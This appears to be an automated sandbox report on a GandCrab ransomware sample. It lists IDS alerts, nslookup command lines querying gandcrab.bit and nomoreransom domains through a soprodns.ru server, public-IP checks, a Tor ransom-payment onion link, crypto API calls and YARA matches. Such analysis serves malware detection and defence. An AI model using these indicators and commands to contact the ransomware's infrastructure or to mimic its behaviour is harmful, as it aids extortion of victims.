                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:61421 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:65198 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:65199 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:65200 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:65201 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:53051 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:53052 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:53053 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:53054 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:60090 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:60091 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:60092 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:60093 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:53430 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:53431 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:53432 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:53433 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:65513 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:65514 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:65515 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:65516 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:51994 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:51995 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:51996 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:51997 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:58121 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:58122 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:58123 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:58124 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:58303 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:58304 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:58305 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:58306 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:63448 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:63449 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:63450 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:63451 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:65387 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:65388 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:65389 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:65390 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:54155 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:54156 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:54157 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:54158 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:50786 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:50787 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:50788 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:50789 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:64123 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:64124 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:64125 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:64126 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60827 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60828 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60829 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60830 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:49203 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:49204 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:49205 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:49206 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60475 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60476 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60477 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60478 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:56618 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:56619 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:56620 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:56621 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:57389 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:57390 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:57391 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:57392 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:50230 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:50231 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:50232 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:50233 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:52457 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:52458 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:52459 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:52460 -> 8.8.8.8:53
                        Contains functionality to determine the online IP of the system
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeCode function: 1_2_0FC66E90 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com1_2_0FC66E90
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeCode function: 1_2_0FC66E90 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com1_2_0FC66E90
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeCode function: 14_2_0F9D6E90 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com14_2_0F9D6E90
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeCode function: 14_2_0F9D6E90 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com14_2_0F9D6E90
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeCode function: 20_2_0F9D6E90 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com20_2_0F9D6E90
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeCode function: 20_2_0F9D6E90 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com20_2_0F9D6E90
                        Found Tor onion address
                        Source: gI5xZdIxUs.exe, 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: 4. Open link in tor browser: http://gdcbghvjyqy7jclk.onion/3a23db8448d3b2b
                        Source: gI5xZdIxUs.exe, 00000001.00000000.272303387.000000000FC72000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: 4. Open link in tor browser: http://gdcbghvjyqy7jclk.onion/3a23db8448d3b2b
                        Source: isqmkp.exe, 0000000E.00000000.307654244.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpString found in binary or memory: 4. Open link in tor browser: http://gdcbghvjyqy7jclk.onion/3a23db8448d3b2b
                        Source: isqmkp.exe, 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpString found in binary or memory: 4. Open link in tor browser: http://gdcbghvjyqy7jclk.onion/3a23db8448d3b2b
                        Source: gI5xZdIxUs.exeString found in binary or memory: 4. Open link in tor browser: http://gdcbghvjyqy7jclk.onion/3a23db8448d3b2b
                        Source: isqmkp.exe.1.drString found in binary or memory: 4. Open link in tor browser: http://gdcbghvjyqy7jclk.onion/3a23db8448d3b2b
                        Uses nslookup.exe to query domains
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ru
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ru
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns2.soprodns.ru
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns2.soprodns.ru
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ru
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ru
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns2.soprodns.ru
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns2.soprodns.ru
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ru
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ru
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns2.soprodns.ru
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns2.soprodns.ru
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ru
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ru
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns2.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns2.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns2.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns2.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns2.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns2.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ruJump to behavior
                        May check the online IP address of the machine
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeDNS query: name: ipv4bot.whatismyipaddress.com
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeDNS query: name: ipv4bot.whatismyipaddress.com
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeDNS query: name: ipv4bot.whatismyipaddress.com
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeDNS query: name: ipv4bot.whatismyipaddress.com
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeDNS query: name: ipv4bot.whatismyipaddress.com
                        Performs many domain queries via nslookup
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns2.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns2.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ruJump to behavior
                        Source: gI5xZdIxUs.exe, isqmkp.exe.1.drString found in binary or memory: http://gdcbghvjyqy7jclk.onion/3a23db8448d3b2b
                        Source: gI5xZdIxUs.exe, 00000001.00000002.537080039.0000000000C7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ipv4bot.whatismyipaddress.com/
                        Source: gI5xZdIxUs.exe, 00000001.00000002.537080039.0000000000C7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ipv4bot.whatismyipaddress.com/4
                        Source: gI5xZdIxUs.exe, 00000001.00000002.537080039.0000000000C7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ipv4bot.whatismyipaddress.com/a
                        Source: gI5xZdIxUs.exe, isqmkp.exe.1.drString found in binary or memory: https://tox.chat/download.html
                        Source: gI5xZdIxUs.exe, isqmkp.exe.1.drString found in binary or memory: https://www.torproject.org/
                        Source: unknownDNS traffic detected: queries for: ipv4bot.whatismyipaddress.com
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeCode function: 1_2_0FC67EF0 lstrcatW,InternetCloseHandle,InternetConnectW,VirtualAlloc,wsprintfW,HttpOpenRequestW,HttpAddRequestHeadersW,HttpSendRequestW,InternetReadFile,InternetReadFile,GetLastError,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,VirtualFree,1_2_0FC67EF0
                        Source: gI5xZdIxUs.exe, 00000001.00000002.537080039.0000000000C7A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                        Spam, unwanted Advertisements and Ransom Demands

                        barindex
                        Yara detected Gandcrab
                        Source: Yara matchFile source: gI5xZdIxUs.exe, type: SAMPLE
                        Source: Yara matchFile source: 14.2.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.0.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 20.2.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.gI5xZdIxUs.exe.fc60000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 20.0.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.gI5xZdIxUs.exe.fc60000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000E.00000000.307654244.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000014.00000000.322638424.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.272303387.000000000FC72000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: gI5xZdIxUs.exe PID: 5280, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: isqmkp.exe PID: 5464, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: isqmkp.exe PID: 1572, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe, type: DROPPED
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeCode function: 1_2_0FC66530 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,1_2_0FC66530
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeCode function: 14_2_0F9D6530 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,14_2_0F9D6530
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeCode function: 20_2_0F9D6530 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,20_2_0F9D6530
                        Source: nslookup.exeProcess created: 42

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: gI5xZdIxUs.exe, type: SAMPLEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                        Source: gI5xZdIxUs.exe, type: SAMPLEMatched rule: Gandcrab Payload Author: kevoreilly
                        Source: 14.2.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                        Source: 14.2.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                        Source: 14.0.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                        Source: 14.0.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                        Source: 20.2.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                        Source: 20.2.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                        Source: 1.0.gI5xZdIxUs.exe.fc60000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                        Source: 1.0.gI5xZdIxUs.exe.fc60000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                        Source: 20.0.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                        Source: 20.0.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                        Source: 1.2.gI5xZdIxUs.exe.fc60000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                        Source: 1.2.gI5xZdIxUs.exe.fc60000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
